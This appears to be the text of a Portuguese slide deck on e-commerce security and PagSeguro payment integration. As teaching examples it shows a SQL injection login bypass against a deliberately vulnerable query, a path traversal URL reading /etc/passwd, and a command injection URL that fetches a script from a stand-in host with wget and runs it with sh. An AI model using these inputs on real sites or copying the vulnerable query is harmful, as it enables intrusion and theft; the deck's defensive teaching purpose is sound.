e­Commerce seguro com PagSeguro

medo

OWASPowasp.org

Segurança em todo o processo

Sistema atualizado

Portas fechadas  

Senhas seguras

SSL

Falhas na aplicação

SQL Injection

<?q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha))?>

<?q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha))?>

login: adminsenha: ' OR '1'='1

<?q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha))?>

login: adminsenha: ' OR '1'='1

SELECT * FROM user WHERE login='admin' AND senha='' OR '1'='1'

Falsificação de Identidade

Controles no Client

<input type="hidden" name="desconto" value="10,00" />

Quebra de Fluxo

http://seusite.com/compra.php?passo=1

Ataques contra outros clients

HTML Injection

Script Injection

XSS

XSRF

Exposição de recursos

http://seusite.com/compra.php?passo=1 &stop=1&template=azul.php

http://seusite.com/compra.php?passo=1 &stop=1&template=azul.php

http://seusite.com/compra.php?passo=1 &stop=1&template=../../etc/passwd

Execução de recursos

http://seusite.com/relatorio.php?tipo=3&gerador=pdfmaker

http://seusite.com/relatorio.php?tipo=3&gerador=pdfmaker

http://seusite.com/relatorio.php?tipo=3&gerador=wget+pirata.com/script

http://seusite.com/relatorio.php?tipo=3&gerador=sh+script

Autenticação falha

Criptografia insegura

Falha de restrição de acesso

Denial Of Service

Pagamento: processo crítico

PagSeguro

PagSeguro:­ Uma única implantação

­ Segurança contra chargeback/fraude

­ EVSSL + Aplicação segura

Formas de implantação:­ Carrinho PagSeguro

­ Carrinho Próprio­ Retorno Automático

Pontos sensíveis:­ HTML do Form de Carrinho

­ URL de Retorno

Proteja sua URL de Retorno:­ Valide com o Token

­ Valide os Valores­ Log

­ Fique alerta!

Obrigado!

visie.com.brelcio@visie.com.br